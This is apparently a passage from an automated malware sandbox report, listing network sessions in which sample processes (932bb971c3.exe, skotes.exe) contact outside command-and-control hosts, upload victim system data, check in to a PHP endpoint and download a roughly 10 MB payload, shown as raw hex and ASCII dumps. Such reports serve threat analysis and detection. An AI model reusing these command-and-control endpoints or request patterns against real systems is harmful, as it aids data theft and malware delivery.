                                                                                                                                                                                                                                                            Data Ascii: |,9Hs0pW<RmbDi6*j8DnQjF4Qh%MCoc_{+#W|oIgwf:+n]|EfF_c[8,pS@Av3?{\5R:tI5,>'bYoMp2=,aap`S5b6'f}nQMcp3k9 d"{;)g0</ljr\
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.182954073 CET1236INData Raw: 07 5e 94 e9 31 a4 87 d6 1b 53 d8 da 90 d0 d0 7e 23 85 36 b4 aa a4 67 c8 c5 00 0d d6 70 b3 6e 3e 09 4c e6 0c 3c c1 0f 60 47 cd 08 64 19 e2 23 ca a4 f5 71 be 4c 3e 3a d3 64 d9 30 a1 ee 43 9b cc a5 2b 36 25 4b 3a 35 0c d6 42 6c e4 06 41 ec 2b 35 d3
                                                                                                                                                                                                                                                            Data Ascii: ^1S~#6gpn>L<`Gd#qL>:d0C+6%K:5BlA+5$fYJ~5:hrfBVIEy)}+fu1+4MFKG`:k>o5{C'B>dcUD)Y~#Pfo-p+"s#<j6i$z3l5m,nR{#JRB#
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.183882952 CET1236INData Raw: 86 1f 4f ef c4 e9 b5 4a 24 ca 77 a1 98 a1 77 94 ff a0 70 ed 6c 93 73 0c e4 ca 71 be bd 92 0c 50 9a 81 90 55 0c 8a 9c 17 a2 e1 58 0c 1e 9b 1c e7 f8 61 58 86 73 c6 ef e9 0c 8c c2 e1 c0 e9 b5 4a a2 41 3a e8 1d dc 6a 4b e9 eb ee d9 70 69 29 14 bd 89
                                                                                                                                                                                                                                                            Data Ascii: OJ$wwplsqPUXaXsJA:jKpi)LR~m_>j7Il&[q$1x)RSpLj!WT@,HnpN#D%+]j/T9lh7R3IKhP5$w>y?0:hv6{*
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.183897018 CET1236INData Raw: 69 63 8f 3f 1d d8 1a 99 4c 17 0c 86 3b cd 9e 50 5a dc 6e f1 35 a2 74 53 0f 98 7f f4 06 2e 40 b4 dc 3d ec 46 8e 2d 4b 06 7e e3 78 34 6e 64 c4 31 1a 9d a1 ba 9b e7 b0 3f 08 2c ab 35 66 f3 34 3e 07 86 89 16 c6 7b d8 88 23 41 ab cb c4 95 87 d7 18 8d
                                                                                                                                                                                                                                                            Data Ascii: ic?L;PZn5tS.@=F-K~x4nd1?,5f4>{#ARm :GX #K,l^WK=fAc{\xF8bT@/#wk%pud(tqMol-Q,1L.'R)cWrbva4dOiT%'_PCdcfA@6Rn-
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.301672935 CET1236INData Raw: 8a ac 46 68 74 8a 28 52 0e 19 8c 77 35 82 ae 29 cb ea a1 0c 42 a7 16 ed 20 d1 36 ba 67 21 44 f6 9c ee b6 5c e6 9c 79 b4 30 57 75 a4 e8 55 91 b1 c1 76 e3 7a b3 48 32 b1 af ef bd 96 3f 13 38 8a 4b 97 ef 72 0f cc cd 8d c3 96 69 e4 64 83 08 55 b1 4a
                                                                                                                                                                                                                                                            Data Ascii: Fht(Rw5)B 6g!D\y0WuUvzH2?8KridUJ`*Ak7KR++55 Tj1&FkzG$IG*ROjW(I#=d~&EID_fn[<;1H%Y!ZDuZ@12(7O,


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            11192.168.2.449808185.121.15.192805496C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:46.787594080 CET12360OUTPOST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1
                                                                                                                                                                                                                                                            Host: home.twentytk20ht.top
                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                                            Content-Length: 496863
                                                                                                                                                                                                                                                            Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 38 31 35 38 30 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: { "ip": "8.46.123.189", "current_time": "1734815802", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:46.907200098 CET2472OUTData Raw: 41 41 41 41 45 43 41 77 51 46 42 67 63 49 43 51 6f 4c 5c 2f 38 51 41 74 52 41 41 41 67 45 44 41 77 49 45 41 77 55 46 42 41 51 41 41 41 46 39 41 51 49 44 41 41 51 52 42 52 49 68 4d 55 45 47 45 31 46 68 42 79 4a 78 46 44 4b 42 6b 61 45 49 49 30 4b
                                                                                                                                                                                                                                                            Data Ascii: AAAAECAwQFBgcICQoL\/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:46.907270908 CET2472OUTData Raw: 4f 67 66 45 6e 56 76 32 64 70 66 45 57 70 61 70 38 4d 66 46 74 74 70 31 31 34 57 38 51 36 6a 48 71 2b 72 65 4a 50 44 39 33 38 4e 5c 2f 41 50 6a 43 61 66 54 72 6d 43 7a 73 49 58 31 6e 54 39 52 38 53 61 6f 73 56 6a 46 5a 78 66 62 39 4f 57 33 67 68
                                                                                                                                                                                                                                                            Data Ascii: OgfEnVv2dpfEWpap8MfFttp114W8Q6jHq+reJPD938N\/APjCafTrmCzsIX1nT9R8SaosVjFZxfb9OW3ghD6hbAah+Ic8E9rPLbXMMkFxBI8U0MqNHLFLGxV45EYBldWBDKQCCK\/d\/Cvxl4K8YMtxeP4UxGMo4jL63ssxyXN6WGwuc4GMm1QxFbDYXF46hPCYpJuhicNiq9JyU6NSVPEU6lGH83+MfgJ4g+BWb4PLONMLga+F
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:46.907289028 CET2472OUTData Raw: 48 48 38 48 38 66 6c 65 56 4c 2b 36 5c 2f 77 43 58 66 5c 2f 50 54 30 78 58 51 61 45 50 6d 62 76 38 41 62 45 6b 58 37 33 37 52 5c 2f 6e 5c 2f 44 32 6f 57 4f 66 62 76 48 7a 2b 5a 2b 36 6c 48 5c 2f 41 43 33 5c 2f 41 4d 38 64 76 35 30 2b 54 59 51 69
                                                                                                                                                                                                                                                            Data Ascii: HH8H8fleVL+6\/wCXf\/PT0xXQaEPmbv8AbEkX737R\/n\/D2oWOfbvHz+Z+6lH\/AC3\/AM8dv50+TYQifxxy8+X+Xp\/n8afJna7v8j\/9M4v8fx96DoKbR87N8f1\/z+nXtULF5NiZ\/Hyv8P8AP1q5NH+82c7PK83\/ABx0\/rVP\/VrvdI38v\/Wnzf6dPw\/Kg0p9fl+ozzE+RN+z97\/z1\/cD\/Rf\/ANXP0pi\/vNj
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:46.907325029 CET2472OUTData Raw: 57 58 6f 62 78 43 64 31 66 42 76 37 47 33 6a 72 54 76 43 48 67 7a 34 79 61 68 72 52 75 50 37 4a 38 4c 51 61 4c 34 72 76 42 62 4a 48 4a 4d 6c 67 74 72 72 45 57 71 58 45 53 53 79 51 52 73 31 74 42 70 39 76 4b 38 5a 6e 45 73 79 44 62 62 52 79 53 6a
                                                                                                                                                                                                                                                            Data Ascii: WXobxCd1fBv7G3jrTvCHgz4yahrRuP7J8LQaL4rvBbJHJMlgtrrEWqXESSyQRs1tBp9vK8ZnEsyDbbRySjY\/nPij43ftIy6t8Qf2g\/hd4\/wBN174CWM1pbaf4e1Pw9CV0+\/t7vQtNk8M6hocsUutaZewWuonxBf8AiC31e10\/U7SZWS6tbu5ttHs\/4A468P8ANs08VOOI5bi8Lk9N5rhatHHY6ri8Hg8dmed4fLsZhsqh
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:46.907427073 CET2472OUTData Raw: 31 4e 72 76 77 72 42 4e 71 4f 72 61 56 4f 30 76 38 41 6e 7a 6d 76 41 4f 66 59 58 4b 63 78 34 71 79 37 77 30 79 5c 2f 46 38 4b 55 75 4d 4d 5a 77 6c 67 4d 65 71 5c 2f 46 64 66 46 34 72 46 55 38 62 55 77 57 46 6d 73 4e 52 34 6a 6a 55 72 55 61 32 4a
                                                                                                                                                                                                                                                            Data Ascii: 1NrvwrBNqOraVO0v8AnzmvAOfYXKcx4qy7w0y\/F8KUuMMZwlgMeq\/FdfF4rFU8bUwWFmsNR4jjUrUa2JhDLo4ylQWFqZpL6hTccRJUV\/q5lPiBkGLzbLuFcw8TMxwvFlXg\/BcX5hgfY8J0cJhcLVwVLG4qH1itw5OlSr0cNOeYPBVa8sVTypfX6l8PF1XLrOt+Mde+MHh7T9b8K\/ta\/s6R\/HvxlNoGlXWoL+xT4n8Dnx
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:46.925981998 CET2472OUTData Raw: 64 75 33 2b 65 74 54 30 62 64 33 47 4b 30 4e 76 61 2b 63 76 36 2b 5a 58 71 4f 54 74 2b 4e 53 73 75 4f 44 79 44 55 55 6e 62 38 61 44 57 47 5c 2f 79 5c 2f 56 45 64 46 46 46 42 71 56 36 4b 4b 4b 44 53 6e 31 2b 52 48 35 66 76 2b 6e 5c 2f 31 36 68 66
                                                                                                                                                                                                                                                            Data Ascii: du3+etT0bd3GK0Nva+cv6+ZXqOTt+NSsuODyDUUnb8aDWG\/y\/VEdFFFBqV6KKKDSn1+RH5fv+n\/16hf7p\/D+Yq1Veg0Ith9v8\/hSFSvOe\/41NSFd3r+FRzrz\/r5mntPL8f8AgFPaP7w\/z+NMqxUWw+3+fwqzsIJO34\/0qDu\/0H8qtMueDwRULLjg8g0AMf7p\/D+Ypj9fw\/qalprLux2xQaU+vyIah5+57\/5\/D
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:46.926008940 CET2472OUTData Raw: 51 64 41 7a 5c 2f 58 52 76 76 38 41 75 52 5c 2f 76 54 5c 2f 54 5c 2f 41 44 2b 64 56 6c 6c 38 78 6e 2b 62 79 30 6a 5c 2f 41 4f 57 6e 6d 5c 2f 36 5c 2f 5c 2f 50 66 6e 69 70 70 50 4d 6a 2b 54 5c 2f 6e 33 78 4e 46 35 66 4d 2b 66 38 39 65 39 4d 6b 33
                                                                                                                                                                                                                                                            Data Ascii: QdAz\/XRvv8AuR\/vT\/T\/AD+dVll8xn+by0j\/AOWnm\/6\/\/PfnippPMj+T\/n3xNF5fM+f89e9Mk37nf+PIixHN\/qefSgBn7zzJv3Pyf8suPPg\/z29\/Whdkkb\/wv\/o\/lfvf3E35\/wDL8f6du00kny4+4nm4\/wCm\/b\/Re3H+cUyRv76b\/wDlt+7\/AOWP\/wCup9r5y\/r5nQQt919\/yJ\/1y\/f\/AOfqf
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:46.926083088 CET4944OUTData Raw: 73 2b 31 66 7a 6d 2b 4d 50 32 7a 50 69 50 2b 79 37 5c 2f 41 4d 46 4b 50 32 6e 5c 2f 41 42 4a 6f 65 72 58 46 39 62 65 49 66 2b 45 5a 30 50 55 74 4d 31 46 68 66 57 39 39 6f 6e 77 2b 6a 38 44 65 4e 59 5c 2f 44 74 6c 62 58 52 6b 69 68 76 64 65 38 4d
                                                                                                                                                                                                                                                            Data Ascii: s+1fzm+MP2zPiP+y7\/AMFKP2n\/ABJoerXF9beIf+EZ0PUtM1FhfW99onw+j8DeNY\/DtlbXRkihvde8M+HPEnw50KeFBNpM3jma9sTDdoky\/wBBXwo8SaJ4m+FvgHWPDurafrelXPhPQkh1DTLqG8tXkttOgtrmHzoGZVntbmKa3u7dys1tcRy288cc0bIPJPjr\/wAExP2QP2prq68Y6lpOq+CfixfQ2N5rPjz4deInsNdm
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:46.926150084 CET2472OUTData Raw: 7a 76 7a 50 34 64 75 50 53 70 35 33 35 66 31 38 7a 73 4b 66 79 4e 73 5c 2f 6a 48 38 5c 2f 77 43 76 2b 54 31 37 72 4a 5c 2f 65 33 78 5c 2f 76 4a 52 35 73 6e 2b 63 55 37 4f 4e 36 5c 2f 77 44 50 4c 5c 2f 36 31 4d 78 2b 37 64 39 32 39 5c 2f 4e 5c 2f
                                                                                                                                                                                                                                                            Data Ascii: zvzP4duPSp535f18zsKfyNs\/jH8\/wCv+T17rJ\/e3x\/vJR5sn+cU7ON6\/wDPL\/61Mx+7d929\/N\/T+X+P1rU1515\/18xh5Xek0af8sfL\/AMP6\/wBKY2\/zP77x\/wDPP\/P496mxjfh\/+3fys+T\/AC9\/8mmSeWuz\/WeZ3jj46f5\/+vQWVu5QpvTH+s\/z\/nv0JqFo\/n8nZ5zyf9t\/fj\/P1q42zZ9+NE\/
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:47.026855946 CET2472OUTData Raw: 44 42 59 76 4d 5a 70 30 36 6c 61 6e 57 72 31 49 5a 66 6c 2b 4f 78 30 36 57 46 70 31 71 73 4d 4a 67 38 54 69 4a 51 56 4b 68 55 6e 48 4a 56 76 37 2b 66 79 35 5c 2f 6c 58 53 36 46 34 75 38 54 2b 47 5a 46 6c 30 48 58 4e 53 30 77 70 49 4a 52 46 62 58
                                                                                                                                                                                                                                                            Data Ascii: DBYvMZp06lanWr1IZfl+Ox06WFp1qsMJg8TiJQVKhUnHJVv7+fy5\/lXS6F4u8T+GZFl0HXNS0wpIJRFbXLi2aQEEPJaOXtZXBAIaSFiDyMGvOx4k8PEMw17RSELByNUscIV5YMfPwpUcsDjHenxeINCnV3g1rSJkj\/1jxalZyKnGfnZJiF4BPzEcc9K9\/MMNkmc4Srl2a4fK81wOIjatgcwpYTHYSvHqquGxMatGrGz2nCS1
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:50.235759974 CET183INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.22.1
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:49 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 26
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 71 56 7a 63 71 61 75 45 49 6e 6d 50 75 32 7a 79 31 37 33 34 38 31 35 38 30 39
                                                                                                                                                                                                                                                            Data Ascii: qVzcqauEInmPu2zy1734815809


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            12192.168.2.449809185.215.113.43801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:50.264297962 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 64 31 3d 31 30 31 39 36 36 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                            Data Ascii: d1=1019669001&unit=246122658369
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:51.392978907 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:51 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            13192.168.2.449812185.121.15.192805496C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:51.243285894 CET126OUTGET /TQIuuaqjNpwYjtUvFojm1734579850?argument=qVzcqauEInmPu2zy1734815809 HTTP/1.1
                                                                                                                                                                                                                                                            Host: home.twentytk20ht.top
                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:52.823084116 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.22.1
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:52 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Content-Length: 10816560
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="rv51177YokPZVCqUwH;"
                                                                                                                                                                                                                                                            Last-Modified: Thu, 19 Dec 2024 03:44:11 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            ETag: "1734579851.0611851-10816560-3179419858"
                                                                                                                                                                                                                                                            Data Raw: 55 78 46 65 a1 3a 05 2f ad 85 48 29 99 72 72 1f 57 9e 7a 01 c8 46 f5 9d 4d 54 5d 9e b8 77 b0 56 cc 09 e2 1b 73 38 0c fd 7f b2 f8 18 31 68 af 89 fe 0d 63 4a 56 08 86 5f ca 78 d6 d2 a6 26 77 5d 54 9f dc c5 35 af c0 67 03 5d fb f0 c3 48 21 17 f9 45 74 a0 29 f7 50 02 82 21 8c a6 3e 7d 18 0a 37 93 3d 20 9b e3 f3 f1 0f 25 7a d4 d1 71 ca 18 dc 4d f8 ec 2c d2 c1 7a 6e 71 a8 d2 bb 4b 86 ec 20 92 bb a3 5d 91 f9 91 35 a0 9f 5d 04 3d d9 d3 d6 05 d2 c0 60 3c e2 eb d3 e1 17 54 04 a1 2b 5b 10 11 c8 dd 32 71 5f 00 2f 8d e7 b2 6f 74 48 e3 90 22 9d 6b c0 59 39 9f 6d fd 55 f0 a4 d9 60 c3 69 dc 8b 41 91 cc a3 42 df 93 f9 49 f2 91 b0 4e cf 69 87 af d7 85 11 ce 61 ea f1 0d a0 b6 f4 e7 9c 87 c9 8f 61 b9 35 66 ae e4 52 f3 5d 38 62 96 ae 99 62 5c fd 1e 36 8f 5f 0a 61 e7 2c cc 2c 5a 1d a9 f7 93 f6 72 14 fc b2 5a 7d 1b a9 a8 b9 96 d8 b9 90 f4 29 71 76 d9 95 42 a7 29 c3 ee b9 24 65 b8 08 74 aa 80 c4 ac da dc b9 28 88 9d 46 99 d2 59 ad 0c 9c f1 eb 88 f2 56 28 71 92 f6 e7 79 15 f3 1f 9b 4d 9b 87 e1 89 4d 59 9b e9 56 12 2f ad 4d [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: UxFe:/H)rrWzFMT]wVs81hcJV_x&w]T5g]H!Et)P!>}7= %zqM,znqK ]5]=`<T+[2q_/otH"kY9mU`iABINiaa5fR]8bb\6_a,,ZrZ})qvB)$et(FYV(qyMMYV/ME)$2vk}Uz4{5ilWF^f/I1bLRidqa7!Q]~1_}mI9NJA)*Sxk1ib,c'uq*p<RJ<X#}mWl{$uooqfnp&GUH?8E0JvCivXpRB!7'PJzKpO6 l==adoey<}w1lG+06XAvdSO,6u,_4`H&mUY%r+[Q{ST"@|lj=#[+e:*FQxT[-M)>MNSnfocygsj%ThxaydoMRW=Q@L
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:52.823360920 CET1236INData Raw: a3 3a 4d 03 17 1c 22 4f a7 4e c0 48 6e f8 70 e6 19 ea 15 49 51 ef ef 49 26 01 fb 75 fb 59 6e 2a ad 0c c8 f2 0c 2a 04 0c 91 39 d5 c8 cb 85 6a f1 83 26 8c d7 de 80 cc 16 10 eb ee a4 6e f9 7d 3f ff 15 27 be 51 4a 28 06 f3 48 33 55 69 c3 c9 c6 52 e7
                                                                                                                                                                                                                                                            Data Ascii: :M"ONHnpIQI&uYn**9j&n}?'QJ(H3UiRT',5Ym\bD!*_x4iH3d"I#-Hq$AI3t(%a_@(ihr.8,WJ"Y*MBQc>UEw6F a-"0F-n0z
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:52.823374033 CET1236INData Raw: 6b ec 98 0c 41 d7 94 5d 3a f7 93 f9 8f 32 7e 93 c9 2f 34 56 a9 9a 7f aa 1a 5a 5d b7 e4 b0 da 83 15 2b 3c 45 15 19 c2 95 a6 59 97 b1 8a 4a 57 79 af b8 7f 14 35 c6 a9 9a 16 c5 3b 8d 2f f9 cb a4 8b 9c 42 c9 02 90 8b 0b b7 84 5a 44 c1 77 09 65 af 76
                                                                                                                                                                                                                                                            Data Ascii: kA]:2~/4VZ]+<EYJWy5;/BZDweviGRs8e'yt(Jt'MXrO@=P[:M`i4lXIU^pj?e`@y.nI6>U<I3s`&AJ^sr7wTjizUU:jMu,
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:52.823797941 CET1236INData Raw: 34 c5 ce d8 68 25 e3 c0 44 c4 dd ed 2b 8d a6 b7 06 f8 59 60 f8 95 18 c9 67 52 a7 e0 2e 17 33 5a 61 c6 62 84 dc 3f 36 bc c3 b8 05 a8 db 84 f7 59 2f 18 0a b0 37 d3 2b fe 46 03 9f 10 4a 16 29 f0 b9 da f6 e6 cb 83 3d 6e c5 c5 16 9b e3 96 a6 15 52 4d
                                                                                                                                                                                                                                                            Data Ascii: 4h%D+Y`gR.3Zab?6Y/7+FJ)=nRM-@@foZsg"QPOIV6!f.#6)qN5I;qgB9Xf(O)[;./w\-X.XD6 SgBq,aWX?G
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:52.823810101 CET1236INData Raw: 82 d3 02 42 f1 0c 4f 78 bb 6d 68 5c 5c b3 fc 62 4d 80 4e e7 98 39 58 3e 0a 13 38 9e 91 89 e2 33 5a 46 54 96 da 45 a5 64 95 d1 b1 de 07 b5 6f e6 93 31 25 b9 be 44 2a 13 00 1b f4 cc 4f ef 4f c8 a8 10 69 00 00 5d 3f 5b 2d 27 48 ee be 4b 12 12 fa 20
                                                                                                                                                                                                                                                            Data Ascii: BOxmh\\bMN9X>83ZFTEdo1%D*OOi]?[-'HK ge#g]S=XA0qBWJ}=]|aapqA2a~k4ik0KRzqNTJL>'mN\Gs):@2KEY0
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:52.823820114 CET1236INData Raw: b0 bb e7 a8 ee 35 b1 65 29 3d b8 08 d6 e0 a5 be 92 75 92 2e e7 82 48 5a 2b 91 1a cd 3f 81 fc 22 fb d0 f8 46 ab 47 f7 80 e6 10 25 57 c4 ae 22 85 d4 4a 29 b5 e6 92 43 97 74 d1 d7 bb 1e d1 6d fa 0b eb 1b 14 23 f1 d3 94 07 18 42 5e ea e5 ec 86 25 76
                                                                                                                                                                                                                                                            Data Ascii: 5e)=u.HZ+?"FG%W"J)Ctm#B^%vb;Twjos`c$4g?C-iaBR*POkN';%,.-huwV)(HS~sPdp;hDZ'hV`aM@-ftIqd]^2
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:52.824717045 CET1236INData Raw: 7a 3e 7a 57 d2 94 52 85 6a e6 8c d9 13 2d f7 b7 01 a4 63 7e e5 f4 61 9f 77 82 86 0a 5f f2 70 ea d0 43 bd 38 a7 0f 2a f6 7f e3 42 74 6f 7f c2 7c 1d b7 d3 f2 4e 53 41 aa e4 e3 31 69 af aa 13 75 dc 1b a5 41 4d 0b 6c 22 ef 98 92 e9 00 b0 c2 7e c2 57
                                                                                                                                                                                                                                                            Data Ascii: z>zWRj-c~aw_pC8*Bto|NSA1iuAMl"~WZBD]@:6e;@>ki8Lp$U1FDN9;\C^3=pUUt(4O2y8JM-gl@/6I0}y7p&tT!#Ex`W(y
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:52.824729919 CET1236INData Raw: 9a 89 ff 83 89 9a 85 6b 32 0b e6 26 0c 63 28 de 85 0e 90 63 5f 70 df fa 8a 10 b0 11 48 4a bc 3f 95 83 c3 5b 07 3b 00 bb c8 a3 b8 88 66 63 16 7c af 14 24 04 3d 58 f9 e7 8f c5 28 92 54 52 5d ed 4e db d1 fd fa 39 6a 46 c4 8e a2 17 85 dd 7c 84 ef 24
                                                                                                                                                                                                                                                            Data Ascii: k2&c(c_pHJ?[;fc|$=X(TR]N9jF|${jh3uL/u1XHI/A0yZ xL.Ey9$W_vhEuT":5aCZi+I{UTB"!F_&:/$
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:52.824738979 CET1236INData Raw: c0 4a 4a 24 2c 5e 58 95 07 c6 67 14 45 42 7b 7d a4 0c 0b 1b 20 11 ac 63 3a dc 1f 22 b3 cc e4 8c 66 67 ac ff b0 03 2b 66 74 be a5 ed d9 c1 cc b6 d7 5c ae c5 09 ea fa fa 13 73 d4 96 a4 cf dc 54 82 31 9f 58 4a 98 ca cd d9 e3 94 d9 f5 31 74 18 52 39
                                                                                                                                                                                                                                                            Data Ascii: JJ$,^XgEB{} c:"fg+ft\sT1XJ1tR96{n,.X9/ueHe,-``W(B<G=,f?sS+b"^JXfd5Lni>m)"\JprpX.8V2ZOTJ!%a|K2
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:52.825577021 CET1236INData Raw: b9 3f 4f 49 ee 75 79 65 a3 87 7e f1 d9 df b1 d6 07 6c b6 64 ad ff e8 a3 ea 93 12 c7 57 f9 62 ba 59 99 e6 87 eb 1b 22 3b 63 f4 b4 42 84 72 23 a3 67 b7 89 3a 24 cb 26 98 03 71 f4 b7 eb cb 8d be e0 f9 d0 fd da e0 6f 8f e4 5f 69 79 48 70 5c 09 44 09
                                                                                                                                                                                                                                                            Data Ascii: ?OIuye~ldWbY";cBr#g:$&qo_iyHp\D"LOgHr+xrAS+M#7*t*XA5^ly4^:@1(;7I%s)V$M#7K"=EJ$#/8(KL>-Tv_
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:52.942962885 CET1236INData Raw: 9c bc e5 b4 ea 2e 76 14 64 00 3f c7 bd 73 eb 7e 3a 79 bf 3e 13 55 e9 a0 8b d0 66 d2 8d cf 16 78 c1 9a 51 00 ed 23 09 d1 09 54 cb c0 f0 cc 1c c3 5a 07 b3 d5 8b de 12 f9 f1 74 17 f3 44 6d 45 70 e8 ac 5e 5d 77 a4 17 28 64 6d 82 85 9b 90 22 fd 02 91
                                                                                                                                                                                                                                                            Data Ascii: .vd?s~:y>UfxQ#TZtDmEp^]w(dm"=r#OkG*s}T+^e*JRq`I DY<.!WT2RZ6;MN3*LyCZiE$17*9PSE#f8G;0Rq6


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            14192.168.2.449813185.215.113.16801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
